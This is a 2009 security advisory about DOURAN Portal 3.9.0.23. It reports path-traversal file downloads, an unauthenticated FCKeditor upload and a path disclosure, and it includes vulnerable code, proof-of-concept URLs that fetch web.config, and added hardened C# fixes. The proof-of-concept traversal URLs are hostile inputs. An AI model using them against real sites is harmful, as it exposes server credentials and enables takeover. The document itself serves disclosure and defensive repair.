
DOURAN Portal 3.9.0.23 Multiple Remote Vulnerabilities

Abysssec Inc Public Advisory

Description :

These vulnerabilities were found one year ago, and the new version of this portal "is not" affected by them any more,
but lots of web sites still use the old version and are vulnerable, and the new version is also not "fully secure".
Because of the patching, there is no point in keeping these private any more. These vulnerabilities are published
for educational purposes only, and the author will not be responsible for any damage caused by using them.

Discovery : www.Abysssec.com

Title : Douran Portal Multiple Remote Vulnerabilities
Affected Version : DOURAN Portal  <= V3.9.0.23
Vendor Site    : www.douran.com


Vulnerabilities :

1- File Download Vulnerability in /Admin/ImportExport/download.aspx

Vulnerable Code :

    string strFileName = Request.Params["Filename"];
    if((strFileName != null) && (strFileName != ""))
    {
        string strPath = Server.MapPath("../../_DouranPortal/ExportPortal");
        strPath += "\\" + strFileName; // Vulnerability: request-supplied name appended without validation
        if(System.IO.File.Exists(strPath))
        {
            Response.Clear();
            Response.ContentType = "application/octet-stream";
            Response.AddHeader("Content-Transfer-Encoding", "binary");
            Response.AddHeader("Content-Disposition", "attachment; filename=\"" + strFileName + "\"");
            Response.Flush();
            Response.WriteFile(strPath);
            Response.End();

        .....

PoC : http://www.vulnerable.com/Admin/ImportExport/Download.aspx?filename=../../web.config

2- File Download Vulnerability in /download.aspx

Vulnerable Code :

    string fileNameAttach = Request.Params["FileNameAttach"];
    string filePathAttach = Request.Params["FilePathAttach"];
    string originalAttachFileName = Request.Params["OriginalAttachFileName"];
    if((fileNameAttach != null) && (filePathAttach != ""))
    {
        string strPath = Server.MapPath(filePathAttach + "/" + fileNameAttach); // Vulnerable: both path parts come from the request
        if(System.IO.File.Exists(strPath))
        {
            System.IO.Stream iStream = null;

            // Buffer used to read the file in 1 MB chunks:
            int segmentLegthToRead = 1024 * 1024;
            byte[] buffer = new Byte[segmentLegthToRead];
        ......

PoC : http://www.vulnerable.com/download.aspx?FileNameAttach=/web.config
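
A hardened form of the path handling in vulnerabilities 1 and 2, added here as an example and not part of the advisory or of DOURAN Portal: the base directory is fixed on the server, the requested name is canonicalized, and anything that resolves outside that directory is rejected. SafeDownload, ResolveInside and the sample directory are hypothetical names.

```csharp
using System;
using System.IO;

// Added example: hypothetical helper, not DOURAN Portal code.
public static class SafeDownload
{
    // Returns the canonical path of requestedName inside baseDir, or null
    // when the name is empty, malformed, or resolves outside that directory.
    // baseDir must come from server-side configuration, never from the request.
    public static string ResolveInside(string baseDir, string requestedName)
    {
        if (string.IsNullOrEmpty(requestedName))
            return null;

        // Canonical base with exactly one trailing separator, so that
        // "ExportPortal" cannot prefix-match a sibling like "ExportPortal2".
        string root = Path.GetFullPath(baseDir).TrimEnd(
            Path.DirectorySeparatorChar, Path.AltDirectorySeparatorChar)
            + Path.DirectorySeparatorChar;

        string candidate;
        try
        {
            // GetFullPath collapses "." and ".." segments. Path.Combine returns
            // requestedName alone when it is rooted, which then fails the check.
            candidate = Path.GetFullPath(Path.Combine(root, requestedName));
        }
        catch (Exception ex)
        {
            if (ex is ArgumentException || ex is NotSupportedException
                || ex is PathTooLongException)
                return null; // illegal characters, bad format, or too long
            throw;
        }

        // Case-insensitive comparison assumes a Windows/IIS file system.
        return candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase)
            ? candidate : null;
    }

    public static void Main()
    {
        // Constructed sample inputs; the last two are the advisory's PoC values.
        string baseDir = Path.Combine(Path.GetTempPath(), "ExportPortal");
        string[] names = { "backup.zip", "sub/../backup.zip", "../../web.config", "/web.config" };
        foreach (string n in names)
            Console.WriteLine("{0,-20} -> {1}", n, ResolveInside(baseDir, n) ?? "REJECTED");
    }
}
```

A handler would call File.Exists and Response.WriteFile only on the returned path, and build the Content-Disposition header from Path.GetFileName of that path rather than from the raw parameter.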

3- File Upload Vulnerability in DesktopModules/fck/editor

Vulnerability :

FCKeditor is exposed without any authentication, which gives an attacker the ability to
upload his / her own file, and FCKeditor won't check the file extension,
so the attacker can upload a malicious server-side ASP / ASPX / PHP / JSP file.
This vulnerability can therefore give complete access to the server / portal.

PoC : http://www.vulnerable.com/DesktopModules/fck/editor/filemanager/upload/test.html

4- Path Disclosure Vulnerability in DesktopModules/DesktopCalendar/HZAN_pickercal.aspx

Vulnerable Code :

    Calendar1.FullWidth = true;
    // Query-string values are parsed without validation; Parse throws on malformed input
    Calendar1.BigCaledar = bool.Parse((string)Request.QueryString["calsize"]);
    if (!IsPostBack)
    {
        Calendar1.Date = new DateTime(long.Parse((string)Request.QueryString["curd"]));
        Calendar1.CalendarCulture = (HZAN.Calendar.CultureType)Enum.Parse(typeof(HZAN.Calendar.CultureType),(string)Request.QueryString["culture"]);
        seldate = Calendar1.Date.ToShortDateString();
        ChangeSelDate1();
    }


PoC : http://www.vulnerable.com/DesktopModules/DesktopCalendar/HZAN_pickercal.aspx?calsize='
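
The Parse calls above throw on malformed input such as the PoC value, and an unhandled exception page can expose the physical path. The following added example (not part of the advisory or of DOURAN Portal) validates the same three parameters without throwing; CalendarQuery and the CultureType members are hypothetical stand-ins, and the sample values are constructed.

```csharp
using System;

// Added example: hypothetical helper, not DOURAN Portal code.
// Stand-in for HZAN.Calendar.CultureType; its member names are assumed.
public enum CultureType { Gregorian, Persian }

public static class CalendarQuery
{
    // Validates calsize, curd and culture without throwing. Returns false on
    // any malformed value so the page can answer with a generic error.
    public static bool TryParse(string calsize, string curd, string cultureName,
        out bool big, out DateTime date, out CultureType culture)
    {
        date = DateTime.MinValue;
        culture = default(CultureType);
        long ticks;

        if (!bool.TryParse(calsize, out big)) return false;
        if (!long.TryParse(curd, out ticks)) return false;
        // new DateTime(ticks) throws ArgumentOutOfRangeException outside this range.
        if (ticks < DateTime.MinValue.Ticks || ticks > DateTime.MaxValue.Ticks)
            return false;
        // Enum.TryParse accepts any numeric string, so also require a defined member.
        if (!Enum.TryParse<CultureType>(cultureName, true, out culture)
            || !Enum.IsDefined(typeof(CultureType), culture))
            return false;

        date = new DateTime(ticks);
        return true;
    }

    public static void Main()
    {
        // Constructed inputs: one valid request, then one bad value per field.
        string[][] cases = {
            new[] { "true", "633782016000000000", "Persian" },
            new[] { "'", "633782016000000000", "Persian" },
            new[] { "true", "-1", "Persian" },
            new[] { "true", "633782016000000000", "42" },
        };
        foreach (string[] q in cases)
        {
            bool big; DateTime date; CultureType culture;
            Console.WriteLine("{0} -> {1}", string.Join(",", q),
                TryParse(q[0], q[1], q[2], out big, out date, out culture));
        }
    }
}
```

Pairing this with customErrors mode="RemoteOnly" (or "On") in web.config keeps any exception that still escapes from being rendered with its stack trace and physical path.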
Final Note : for advanced security topics / sharing ideas, etc. ... please feel free to contact me at : admin [at] abysssec.com

# milw0rm.com [2009-05-18]




Abysssec                                                                                                             05/18/2009

				